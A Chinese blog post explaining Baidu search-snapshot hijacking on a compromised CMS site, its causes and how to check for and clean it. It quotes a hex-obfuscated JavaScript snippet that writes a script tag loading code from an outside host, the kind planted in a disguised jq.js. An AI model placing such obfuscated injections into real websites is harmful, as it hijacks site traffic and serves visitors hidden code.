前段時(shí)間朋友裝修站經(jīng)常有些莫名其妙的搜索關(guān)鍵詞來到網(wǎng)站，第一感覺就是被人攻擊了，但也看不出有什么異樣，只是在快照上有顯示主域名的標(biāo)題卻是另外的菠菜站。由此初步懷疑是百度快照劫持，首先了解下什么是快照劫持。

? ? ? 百度快照劫持就是黑客通過技術(shù)手段拿到你網(wǎng)站FTP權(quán)限或者數(shù)據(jù)庫權(quán)限植入代碼或添加劫持腳本，把他想要的內(nèi)容寫進(jìn)一個(gè)頁面代碼里，在首頁Head標(biāo)簽下調(diào)用，當(dāng)搜索引擎訪問你網(wǎng)站的時(shí)候抓取到你網(wǎng)站的標(biāo)題-關(guān)鍵詞-描述的時(shí)候，就會抓取到黑客設(shè)定的任何內(nèi)容！

? ? ? 一般用site命令查看百度快照情況，如

site:...

? ? ? 如果看到和你寫的標(biāo)題、描述不一樣，就可以判斷是黑客對快照進(jìn)行劫持。了解常見的劫持方法，防患于未然，保障網(wǎng)站安全。

? ? ? 從上面的截圖看來中標(biāo)的不在少數(shù)哇，點(diǎn)擊“百度快照”查看快照信息，標(biāo)題、描述、關(guān)鍵詞都正常，時(shí)間也是較新的。嘗試投訴快照，情況依舊，就給百度反應(yīng)情況，還在等待回復(fù)中。

? ? ? 除了找百度解決問題之前，還需要對自己的網(wǎng)站進(jìn)行查找、修復(fù)等操作，以免再次受到攻擊。

一 放到<head>標(biāo)簽

? ? ? 網(wǎng)站設(shè)計(jì)中<head>標(biāo)簽里面有標(biāo)題、描述、關(guān)鍵詞等內(nèi)容，這部分是明顯寫上去的，如果是寫到生成后的靜態(tài)首頁html文件里，每次更新首頁都會消失。但如果不久后又被修改了，就有可能是通過其他木馬定時(shí)修改的，要注意找出來。

? ? ? 以DedeCMS為例，有些文件夾是禁止執(zhí)行腳本的，所以能修改你的文件肯定在能執(zhí)行的文件夾內(nèi)，如果對文件結(jié)構(gòu)不是很熟悉的，可以和官方的文件夾進(jìn)行對比就能找出問題所在。

二 偽裝JS文件、修改PHP文件

? ? ? 這個(gè)我們你一定經(jīng)歷過，比如DedeCMS的版權(quán)信息，如果你用{dede:global.cfg_poweby/}，后面都會加上自帶的織夢鏈接；下載的模板會在友情鏈接里面加入模板開發(fā)者的友情鏈接，這些鏈接是在模板里面看不到的，每次刷新位置都不一樣。

? ? ? 需要注意的是，瀏覽器并不識別JS腳本，如果用JS的方式插入鏈接，在查看源代碼里面是完全看不到具體內(nèi)容的。其實(shí)這個(gè)方法也并不高級，常見的如：

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

? ? ? 該js文件里面有類似這樣的代碼：

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

document.writeln(_$[0]);

? ? ? 第一句是通過加密的代碼，第二句輸出內(nèi)容，一般服務(wù)器做特殊處理，才能輸出正確的內(nèi)容，所以應(yīng)該還有一些PHP文件。

? ? ? PHP有許多包含的寫法，比如/include文件夾，在核心的PHP文件里面加入劫持代碼，神不知鬼不覺。

? ? ? 上面的方法都是比較常見的，一般的CMS有一定的防護(hù)能力，只要自己的數(shù)據(jù)庫、服務(wù)器密碼不泄露，這些都能及時(shí)解決。

三 你已經(jīng)成為黑客的“肉雞”

? ? ? “肉雞”可能很多人不太理解，說白了，服務(wù)器、數(shù)據(jù)庫已經(jīng)被黑客拿到了，或者說獲得修改權(quán)限。

? ? ? 百度有主動提交（投訴）快照的功能，黑客可以在晚上無人值守的時(shí)候偷偷修改模板文件，生成主頁后向百度提交URL，然后再回復(fù)成原來的樣子。

快照劫持總結(jié)

? ? ? 黑客通過快照劫持代碼能實(shí)現(xiàn)百度快照劫持，是黑帽SEO比較早的技術(shù)，通過劫持webshell網(wǎng)站，實(shí)現(xiàn)自己的網(wǎng)站排名，主要功能是改變webshell網(wǎng)站的快照，使其快照顯示為你設(shè)置的快照，這個(gè)時(shí)候?qū)Ψ降木W(wǎng)站快照(包括標(biāo)題，關(guān)鍵字，描述都變成你的)。

? ? ? 代碼通過實(shí)現(xiàn)快照變成你的，當(dāng)然排名也變成你的，通過內(nèi)置的跳轉(zhuǎn)代碼，每次通過搜索引擎點(diǎn)進(jìn)去，網(wǎng)站就會跳轉(zhuǎn)到其他網(wǎng)站。這就是百度快照劫持的原理，以及更高級的301權(quán)重劫持手法！